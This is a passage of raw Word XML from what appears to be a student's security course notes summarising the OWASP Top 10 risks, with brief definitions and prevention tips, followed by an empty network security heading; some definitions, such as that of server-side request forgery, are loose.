          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture from </w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidRPr="005A0D28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B532A1">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E5D89" w14:textId="1D60DB5A" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="27CBD62D" w14:textId="3E240427" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00412D22">
      <w:r>
        <w:t>Let me talk about the top 10 security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF02AF" w14:textId="34F20A68" w:rsidR="00B532A1" w:rsidRPr="00385FC2" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448607BB" w14:textId="48963483" w:rsidR="00B532A1" w:rsidRDefault="00385FC2" w:rsidP="00B532A1">
      <w:r>
        <w:t xml:space="preserve">It is when the attacker gets inside the victim’s system as a privileged user. This problem sounds less dangerous than it really is. This risk deserves its rank as the top on the list, because giving the attacker all the permission to do anything </w:t>
      </w:r>
      <w:r w:rsidR="0000253B">
        <w:t xml:space="preserve">might terminate the whole system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32746D" w14:textId="2B342031" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF52E96" w14:textId="7E11EBC1" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log all the access control failures, and always alert admins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51154005" w14:textId="5C3EFA10" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0000253B">
        <w:t>Disable web server directory listin</w:t>
      </w:r>
      <w:r>
        <w:t>g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C0C8E" w14:textId="77777777" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9A23ED" w14:textId="244A8E23" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C87B9" w14:textId="2BC2BDEF" w:rsidR="0000253B" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:r>
        <w:t>It is the failures that are related to cryptography. This could leak sensitive and secret information that is being sent through the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD4859" w14:textId="2D6D58B7" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F11FAC" w14:textId="2A17873F" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not store any sensitive data if you do not need them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1EB37" w14:textId="63AC3E59" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encrypt all sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E0BA97" w14:textId="01CDA165" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disable caching for response with sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B53EDD" w14:textId="1E0C7BCD" w:rsidR="00F01C26" w:rsidRPr="00E86C6E" w:rsidRDefault="00F01C26" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01C26">
        <w:t>Always use authenticated encryption instead of just encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B0F6F" w14:textId="632E1E0B" w:rsidR="00F01C26" w:rsidRDefault="00B532A1" w:rsidP="00F01C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B436682" w14:textId="6518882A" w:rsidR="00F01C26" w:rsidRDefault="00F01C26" w:rsidP="00F01C26">
      <w:r>
        <w:t>Injection is when the attacker injects their malicious code into any program to force it to behave as wanted. (e.g., stealing authentication cookies, storing malicious code in the database, retrieving sensitive data from the datab</w:t>
      </w:r>
      <w:r w:rsidR="00182C69">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>se)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792CA944" w14:textId="77777777" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00F01C26"/>
    <w:p w14:paraId="3113F130" w14:textId="77777777" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC6A3A" w14:textId="3FF5B0B1" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use blacklist to the inputs on the website to block any malicious words like the tag script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88414E" w14:textId="2C9109F6" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the LIMIT and other SQL controls within queries to not expose your sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337EA39" w14:textId="1C6355CC" w:rsidR="00182C69" w:rsidRPr="00F01C26" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on your server to block any malicious </w:t>
      </w:r>
      <w:r w:rsidR="00881CA3">
        <w:t>injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BE446" w14:textId="273DA219" w:rsidR="003A6D48" w:rsidRDefault="00B532A1" w:rsidP="003A6D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02804DB0" w14:textId="69FC53B4" w:rsidR="003A6D48" w:rsidRDefault="00A43ABC" w:rsidP="003A6D48">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A43ABC">
        <w:t>Implementing the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suitable design to the web applications is very important to block the way for the attacker to inject something. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52207A20" w14:textId="77777777" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E041A76" w14:textId="06671F1E" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use libraries of secure design patterns on your applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2175D3" w14:textId="4359071F" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49730C33" w14:textId="4068539C" w:rsidR="00A43ABC" w:rsidRPr="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do user testing to test the design of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D2EB52" w14:textId="7506B64E" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8CBDAF" w14:textId="0B8E6779" w:rsidR="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>The security engineers must be aware of every device on their infrastructure and why is it there. The lack of infrastructure security could help the attacker to get into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891CAF0" w14:textId="77777777" w:rsidR="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71244C58" w14:textId="2CC560C7" w:rsidR="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Always check the configurations and setting in all the infrastructure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E8DA2" w14:textId="518304BC" w:rsidR="00F40DEA" w:rsidRPr="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep all the systems updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295626C0" w14:textId="2A598DB2" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DA0A2" w14:textId="74AB110C" w:rsidR="00F40DEA" w:rsidRDefault="0054016E" w:rsidP="00F40DEA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>When you use vulnerable operating systems, web servers, databases, you are giving the attacker the green light to get into your system. The attacker only needs one vulnerable system to compromise your infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620C110" w14:textId="77777777" w:rsidR="0054016E" w:rsidRDefault="0054016E" w:rsidP="0054016E">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9F60A" w14:textId="267E3880" w:rsidR="0054016E" w:rsidRDefault="0054016E" w:rsidP="0054016E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove unused dependencies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A5938" w14:textId="0567FA87" w:rsidR="00D33C0B" w:rsidRPr="0054016E" w:rsidRDefault="00D33C0B" w:rsidP="0054016E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Only click on trusted links from official sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E2C93" w14:textId="04C2102F" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F37D05" w14:textId="50C86AEB" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The passwords, cookies, and session tokens are unique for the user and should not be found by intruders. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7A232" w14:textId="77777777" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA9B61" w14:textId="78C72AB2" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement multi-factor authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBDE26F" w14:textId="613AF173" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement weak password checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4DB799" w14:textId="48034F4C" w:rsidR="00D33C0B" w:rsidRPr="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Limit the requests coming from one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F364E" w14:textId="7A54ABF7" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5614EC" w14:textId="29B2CC2D" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">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7418CED5" w14:textId="77777777" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A29AC8" w14:textId="1E7A7A7D" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Make sure that your service only consumes trusted repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1F519" w14:textId="54E00507" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure to apply security tools like OWASP to your service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DC9BE" w14:textId="44A13C97" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789E3A07" w14:textId="77777777" w:rsidR="00B2488F" w:rsidRPr="000C5B5B" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089F2422" w14:textId="46F70689" w:rsidR="000C5B5B" w:rsidRDefault="00B532A1" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Logging and Monitoring Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F969E" w14:textId="75BD2F3F" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">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715A84CB" w14:textId="77777777" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA6A3C" w14:textId="783DB431" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log every log in failure and wrong input in your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236A4B3" w14:textId="3B2FC81A" w:rsidR="00B2488F" w:rsidRPr="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encode all the log data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C367F" w14:textId="331C64E3" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-Side Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63573154" w14:textId="23D16753" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the attacker adjusts the code to behave as they want. </w:t>
      </w:r>
      <w:r w:rsidR="00F00342">
        <w:t>This could give them sensitive data about the user. Such as, cookies, log in credentials. Then the attacker can do anything that the user can do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4323A32C" w14:textId="77777777" w:rsidR="00F00342" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375A40F" w14:textId="22601FB2" w:rsidR="00F00342" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Separate your networks as many as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CACB978" w14:textId="7D3A6202" w:rsidR="00F00342" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sanitize all the input data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8C2DE" w14:textId="1FFDD787" w:rsidR="00F00342" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not send raw responses to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68421295" w14:textId="1CE9D8ED" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5233BC03" w14:textId="25C0969C" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="685E9824" w14:textId="0FFF8322" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="585671F6" w14:textId="075ED691" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5C5A373D" w14:textId="0C0612B4" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="60083A50" w14:textId="36B1EE5F" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="63128E26" w14:textId="59E42743" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="20C31EEB" w14:textId="7885CE39" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="40454B08" w14:textId="3D5C4228" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1762C09D" w14:textId="428416D5" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="606CD460" w14:textId="4A1C4F66" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3B1EE4CE" w14:textId="2B3C8A21" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="4C8BDEEB" w14:textId="2CF3A96D" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1AB77C16" w14:textId="0C202865" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="48BA5A58" w14:textId="3028CFE4" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="28BC2337" w14:textId="549FB019" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0D3394FD" w14:textId="0EE76297" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5DBDE291" w14:textId="58A9B8DB" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="02257DC8" w14:textId="73571B6C" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="4D471476" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc115553354"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(BOK) Network Security (week 5-8)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="3AE8DE8A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AE2EA6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
